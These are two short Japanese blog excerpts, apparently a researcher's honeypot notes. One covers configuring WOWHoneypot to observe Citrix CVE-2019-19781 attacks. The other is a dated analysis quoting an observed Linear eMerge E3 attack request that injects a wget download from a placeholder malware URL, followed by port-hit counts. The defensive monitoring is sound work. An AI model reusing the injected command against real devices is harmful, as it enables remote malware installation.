Citrix製品の脆弱性CVE-2019-19781ですが、WOWHoneypotのmrrules.xmlでレスポンスをきちんと定義してあげると攻撃を観測できました。mrrules.xmlに以下を追加し、art配下にCitrix_smb_conf.txtを追加しています。-----mrrules.xmlの追加分------- <mrr> <meta> <mrrid>20001</mrrid> <enable>Tr</enable></meta></mrr>…

Honeypot簡易分析(2020/1/19)となります。Linear eMerge E3 シリーズの脆弱性を狙った攻撃を検知していました。/card_scan_decoder[.]php?No=30&door=wgethxxp://malwareurl <Honeytrap>Local Port Top 10LocalPort Count1433 426909 件445 1200 件3389 926 件139 559 </honeytrap>…